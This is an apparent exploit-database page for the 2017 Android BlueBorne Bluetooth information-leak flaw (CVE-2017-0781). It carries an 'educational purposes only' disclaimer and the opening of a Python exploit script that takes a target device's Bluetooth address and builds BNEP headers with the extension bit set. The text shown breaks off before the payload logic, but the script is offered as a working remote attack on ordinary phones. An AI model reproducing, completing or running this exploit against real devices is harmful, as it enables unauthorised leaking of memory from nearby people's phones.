Android bluetooth blueborne information leak (1) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2017-08-09 |
Type : remote |
Platform : android
This exploit / vulnerability Android bluetooth blueborne information leak (1) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
from pwn import *
import bluetooth
if not 'TARGET' in args:
log.info('Usage: python CVE-2017-0781.py TARGET=XX:XX:XX:XX:XX:XX')
exit()
def set_bnep_header_extension_bit(bnep_header_type):
"""
If the extension flag is equal to 0x1 then
one or more extension headers follows the BNEP
header; If extension flag is equal to 0x0 then the
BNEP payload follows the BNEP header.
"""
return bnep_header_type | 128